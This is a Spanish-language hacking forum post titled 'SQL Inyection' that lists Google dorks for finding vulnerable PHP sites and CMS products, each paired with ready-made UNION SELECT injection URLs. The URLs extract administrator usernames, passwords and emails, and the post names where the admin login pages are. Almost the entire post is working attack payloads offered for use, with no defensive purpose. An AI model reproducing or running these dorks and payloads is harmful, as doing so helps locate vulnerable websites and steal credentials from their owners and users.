Mensajes: 69
Registrad@:
01/12/2008
Estado: Desconectad@ |
SQL Inyection
Hola,
aqui les dejo unas inyecciones SQL
--------------------------------------------------------------------
DORK 1 : allinurl: "index.php?go=subcat"
DORK 2 : powered by SSWD
EXPLOiT :
index.php?go=subcat&id=-999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6/**/from/**/admin/*
admin login=admin/login.php (para loguearse)
****************************************************
DORK 1 : powered by Site Sift
DORK 2 : allinurl: "index php go addpage"
DORK 2 : allinurl: "index.php?go=detail id="
EXPLOiT 1:
index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/admin/*
EXPLOIT 2:
index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/from/**/admin/*
ADMiN LOGiN::admin/login.php
SALUDOS A TODOS......EVA
724CMS + "Version 4.01"
index.php?ID=null+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x202d20,ID,User_Login,User_Password),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+FROM+Users--
-----------------------------------------------------------------------------------------------------------
allinurl: "index.php?p=gallerypic img_id"
index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6,7,8+from+koobi4_user
EXPLOiT 2:
index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6,7,8+from+koobi_user
-----------------------------------------------------------------------------------------------------------
DORK 1 : allinurl: "index.php?mod=archives"
EXPLOiT 1:
index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0x3a,pass),7,8,9,10,11,12,13/**/from/**/users/*
EXPLOiT 2:
index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0x3a,pass),7,8,9,10/**/from/**/users/*
EXPLOiT 3:
index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0x3a,pass),7,8,9,10,11,12,13,14/**/from/**/users/*
-----------------------------------------------------------------------------------------------------------
DORK 1 : "Powered by Smoothflash"
DORK 2 : allinurl: "admin_view_image.php"
EXPLOiT :
admin_view_image.php?cid=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/lwsp_users
DORK 1 : allinurl: \"sections.php?op=listarticles\"secid
DORK 2 ; allinurl: \"sections php op\"
EXPLOiT :
sections.php?op=listarticles&secid=-9999999/**/union/**/select/**/concat(aid,0x3a,pwd)/**/from/**/authors/*
sections.php?op=listarticles&secid=-9999999/**/union/**/select/**/concat(aid,0x3a,pwd),1,2,concat(aid,0x3a,pwd)/**/from/**/authors/*
sections.php?op=listarticles&secid=-9999999/**/union/**/select/**/0,concat(aid,0x3a,pwd),2/**/from/**/authors/*
sections.php?op=printpage&artid=-9999999/**/union/**/select/**/0,concat(aid,0x3a,pwd)/**/from/**/authors/*
-----------------------------------------------------------------------------------------------------------
DORK 1 : \"Powered by Esy\"
EXPLOiT 1 :
sections.php?op=viewarticle&artid=-9999999/**/union/**/select/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*
EXPLOiT 2 :
sections.php?op=printpage&artid=-9999999/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/*
-----------------------------------------------------------------------------------------------------------
DORK 1 : allinurl: \"fundlinkllc.com\"
DORK 2 : \"Fundlink LLC\"
EXPLOiT :
showcategory.php?id=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/users
-------------------------------------------------------------
DORK 1 : allinurl: \"index.php?go=detail\"
DORK 2 : allinurl: \"Powered by Com Endeavors\"
DORK 3 : \"Emlak NET Kiralik ve Satilik Emlak Sitesi\"
*****DORKS******
allinurl: \"index php go buy\"
allinurl: \"index.php?go=sell\"
allinurl: \"index php go linkdir\"
allinurl: \"index.php?go=resource_center\"
allinurl: \"resource_center.html\"
allinurl: \"index.php?go=properties\"
allinurl: \"index.php?go=register\"
EXPLOIT :
index.php?go=detail&id=-99999/**/union/**/select/**/0,0,0,0,0,0,0,0,0,0,0x7c,email,0x3a,concat(username,0x3a,password),1,1,1,1,1,1,2,2,2,2,2/**/from/**/admin/*where,limit,2--
admin panel login:
admin/login.php hay muchas
-----------------------------------------------------------------------------------------------------------
DORK 1 : allinurl: \"index.php?pgid\"cat_id
EXPLOIT :
index.php?pgid=4&cat_id=-99999/**/union/**/select/**/1,1,1,concat(email,0x7c,username,0x7c,password),0x3a,1,1,1,1,1/**/from/**/users/*where%20admin1,1
-----------------------------------------------------------------------------------------------------------
DORK 1 : allinurl: "showCat.php?cat_id"
EXPLOIT :
showCat.php?cat_id=-99999/**/union/**/select/**/0,concat(user_name,0x3a,password),2/**/from/**/std_users/*
-----------------------------------------------------------------------------------------------------------
DORK 1 : allinurl: "modules/photo/viewcat.php?id"
DORK 2 : inurl:photo "powered by runcms"
EXPLOIT :
admin
modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*
pass
modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*
-----------------------------------------------------------------------------------
DORK 1 : allinurl: "modules MyAnnonces index php pa view"
EXAMPLE
XXXXMyAnnonces/index.php?pa=view&cid=[EXPLOiT>
EXPLOIT :
for admin = -9999999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*
for pass = -9999999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*
-----------------------------------------------------------------------------------
DorKs 1 : "2007 BookmarkX script"
DORKS 2 : Powered by GengoliaWebStudio
DORK 3 : allinurl :"index.php?menu=showtopic"
EXPLOIT :
index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6/**/FROM/**/admin/*%20admin=1
o
index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6,7/**/FROM/**/admin/*%20admin=1
-----------------------------------------------------------------------------------
DORKS 2 : allinurl: " list.php?pagenum"
EXPLOIT
list.php?pagenum=0&categoryid=1+union+select+111,222,concat_ws(char(5Cool,login,password),444+from+admin_login/*
-----------------------------------------------------------------------------------
DORK 1 : allinurl: \"recipe.php?recipeid\"
admin login=siteadmin
EXPLOIT :
recipe.php?recipeid=99999/**/union/**/select/**/0,concat(login,0x3a,password)/**/from/**/admin_login/*
-----------------------------------------------------------------------------------
DORK 1 : "powered by niccell"
##admin login=siteadmin
EXPLOIT :
list.php?pagenum=S@BUN&categoryid=9999+union+select+111,222,concat(login,0x3a,password),444+from+admin_login/*
----------------------------------------------------------------------------------
DORK 1 : allinurl:\"print.php?recipeid\"
admin login=siteadmin
EXPLOIT :
print.php?recipeid=777%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,concat(login,0x3a,password)/**/from%2F%2A%2A%2Fadmin_login/*where%20admin
-----------------------------------------------------------------------------------------------------------
DORK 1 : allinurl:"list.php?pagenum"catid
admin login=siteadmin
EXPLOIT :
list.php?pagenum=0&catid=99999/**/union/**/select/**/0,concat(login,0x3a,password)/**/from/**/admin_login/* |
